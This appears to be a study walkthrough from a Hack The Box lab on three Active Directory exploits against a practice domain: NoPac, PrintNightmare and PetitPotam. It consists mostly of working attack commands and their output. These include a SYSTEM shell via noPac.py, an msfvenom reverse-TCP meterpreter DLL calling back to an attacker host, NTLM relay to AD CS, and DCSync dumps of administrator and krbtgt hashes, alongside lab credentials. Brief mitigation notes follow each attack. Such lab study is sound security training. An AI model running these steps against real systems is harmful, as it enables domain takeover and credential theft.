H1HTB

Bleeding Edge Vulnerabilities

These attacks enable rapid initial access or privilege escalation in unpatched AD environments, using the username mrci0x1 where applicable.

Lab Setup:

  • Attack Host: Linux-based ATTACK01 (accessed via SSH) for most attacks.

  • Windows Host: MS01 for Windows-based tools (e.g., Rubeus, Mimikatz).

  • Target: INLANEFREIGHT.LOCAL domain, DC at 172.16.5.5.

1. NoPac (SamAccountName Spoofing)

Vulnerabilities: CVE-2021-42278, CVE-2021-42287 Impact: Escalates a standard domain user to Domain Admin in one command. Description: Exploits a SAM bypass and Kerberos PAC flaw to rename a computer account to mimic a Domain Controller’s SamAccountName, obtaining a TGT for SYSTEM-level access.

Prerequisites

  • Impacket and NoPac repository on ATTACK01:

mrci0x1@htb[/htb]$ git clone https://github.com/SecureAuthCorp/impacket.git
mrci0x1@htb[/htb]$ cd impacket && python3 setup.py install
mrci0x1@htb[/htb]$ git clone https://github.com/Ridter/noPac.git

  • Domain user credentials: mrci0x1:Klmcargo2.

  • ms-DS-MachineAccountQuota set to 10.

Scanning

mrci0x1@htb[/htb]$ python3 scanner.py inlanefreight.local/mrci0x1:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap
[*] Current ms-DS-MachineAccountQuota = 10
[*] Got TGT with PAC from 172.16.5.5

Execution

Gain SYSTEM shell:

mrci0x1@htb[/htb]$ python3 noPac.py INLANEFREIGHT.LOCAL/mrci0x1:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap
[*] Successfully added machine account WIN-LWJFQMAXRVN$
[*] Saving ticket in administrator.ccache
[*] Exploiting...
C:\Windows\system32>

Alternative: DCSync

mrci0x1@htb[/htb]$ python3 noPac.py INLANEFREIGHT.LOCAL/mrci0x1:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user INLANEFREIGHT/administrator
[*] Dumping Domain Credentials
inlanefreight.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::

OpSec

  • Risks: SMBEXEC creates services (BTOBTO, BTOBO) and .bat files, detectable by AV/EDR (e.g., VirTool:Win32/MSPSEexecCommand).

  • Mitigation: Set ms-DS-MachineAccountQuota to 0.

2. PrintNightmare

Vulnerabilities: CVE-2021-34527, CVE-2021-1675 Impact: Enables RCE or privilege escalation via Print Spooler. Description: Exploits Print Spooler to execute a malicious DLL, yielding a SYSTEM shell.

Prerequisites

  • Install cube0x0’s Impacket and exploit:

mrci0x1@htb[/htb]$ pip3 uninstall impacket
mrci0x1@htb[/htb]$ git clone https://github.com/cube0x0/impacket
mrci0x1@htb[/htb]$ cd impacket && python3 setup.py install
mrci0x1@htb[/htb]$ git clone https://github.com/cube0x0/CVE-2021-1675.git

  • Credentials: mrci0x1:Klmcargo2.

  • Print Spooler running on target.

Enumeration

mrci0x1@htb[/htb]$ rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol

Execution

  1. Create malicious DLL:

mrci0x1@htb[/htb]$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll

  1. Host via SMB:

mrci0x1@htb[/htb]$ smbserver.py -smb2support CompData /path/to/backupscript.dll

  1. Set up Metasploit handler:

mrci0x1@htb[/htb]$ msfconsole
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 172.16.5.225
msf6 > set LPORT 8080
msf6 > run

  1. Run exploit:

mrci0x1@htb[/htb]$ python3 CVE-2021-1675.py inlanefreight.local/mrci0x1:Klmcargo2@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'
[*] Meterpreter session 1 opened
C:\Windows\system32> whoami
nt authority\system

OpSec

  • Risks: May crash Print Spooler; DLL or SMB activity may trigger AV/EDR.

  • Mitigation: Disable Print Spooler on non-essential servers; apply patches.

3. PetitPotam (MS-EFSRPC)

Vulnerability: CVE-2021-36942 Impact: Forces DC authentication for DCSync via AD CS. Description: Uses MS-EFSRPC to coerce DC authentication to an attacker-controlled host, relaying NTLM credentials to AD CS Web Enrollment for a DC certificate.

Prerequisites

  • Impacket and PetitPotam.py:

mrci0x1@htb[/htb]$ pip3 install impacket
mrci0x1@htb[/htb]$ git clone https://github.com/topotam/PetitPotam

  • AD CS with Web Enrollment enabled.

  • Tools: ntlmrelayx.py, gettgtpkinit.py, secretsdump.py.

Execution

  1. Start NTLM relay:

mrci0x1@htb[/htb]$ ntlmrelayx.py -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController
[*] GOT CERTIFICATE!
[*] Base64 certificate of user ACADEMY-EA-DC01$: MIIStQIBAzCCEn8GCSqGSIb3...

  1. Coerce DC authentication:

mrci0x1@htb[/htb]$ python3 PetitPotam.py 172.16.5.225 172.16.5.5
[+] Attack worked!

  1. Request TGT:

mrci0x1@htb[/htb]$ python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGSIb3... dc01.ccache

  1. Set ticket cache:

mrci0x1@htb[/htb]$ export KRB5CCNAME=dc01.ccache

  1. Perform DCSync:

mrci0x1@htb[/htb]$ secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
inlanefreight.local\administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::

Alternative: Windows-Based (Rubeus)

On MS01:

PS C:\Tools> .\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /certificate:MIIStQIBAzC... /ptt
[*] TGT request successful!
[*] base64(ticket.kirbi): doIGUDCCBkygAwIBBaEDAgEWooIFSDCCBUYmLdFSDCC...
PS C:\Tools> .\mimikatz.exe "lsadump::dcsync /user:inlanefreight\krbtgt"
Credentials:
  Hash NTLM: 16e26ba33e455a8c338142af8d89ffbc

OpSec

  • Mitigation: Patch CVE-2021-36942, enable Extended Protection, disable NTLM, harden AD CS.

PreviousKerberos Attack Methods with Double Hop WorkaroundsNextMiscellaneous Misconfigurations

Last updated